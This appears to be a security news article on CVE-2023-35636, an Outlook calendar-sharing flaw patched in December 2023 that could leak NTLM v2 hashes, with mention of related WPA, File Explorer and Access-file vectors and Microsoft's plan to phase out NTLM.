A recently fixed vulnerability in Microsoft Outlook had the potential to be misused by malicious individuals to acquire NTLM v2 hashed passwords. This could happen when a user opens a file specifically designed for this purpose.
Identified as CVE-2023-35636 and rated with a 6.5 CVSS score, Microsoft resolved this problem in their December 2023 Patch Tuesday updates.
Microsoft explained that in an email-based attack, the vulnerability could be exploited by sending the targeted user a crafted file and persuading them to open it. In a web-based scenario, the attacker could use a website, either owned or compromised, that hosts or allows user-generated content, to house a file created to take advantage of this flaw.
Essentially, attackers would need to convince users to click on a link, found in a phishing email or instant message, and then trick them into opening the file.
The origin of CVE-2023-35636 lies in Outlook's calendar-sharing feature. An attacker can create a harmful email message by inserting two headers, "Content-Class" and "x-sharing-config-url", with specific values that expose the recipient's NTLM hash during authentication.
Dolev Taler, a Varonis security researcher credited with identifying and reporting this flaw, mentioned that NTLM hashes could be compromised through Windows Performance Analyser (WPA) and Windows File Explorer. These two attack vectors, however, have not yet been addressed.
Taler pointed out that WPA's attempt to authenticate using NTLM v2 over the internet is noteworthy. Typically, NTLM v2 is used for internal IP-address-based services, but when transmitted over the open web, it's vulnerable to relay and brute-force attacks.
This revelation follows Check Point's disclosure of a "forced authentication" technique. This method can be used to leak a Windows user's NTLM tokens by deceiving them into opening a malicious Microsoft Access file.
In October 2023, Microsoft announced their intention to phase out NTLM in Windows 11, replacing it with Kerberos. This move aims to enhance security as NTLM lacks support for modern cryptographic methods and is prone to relay attacks.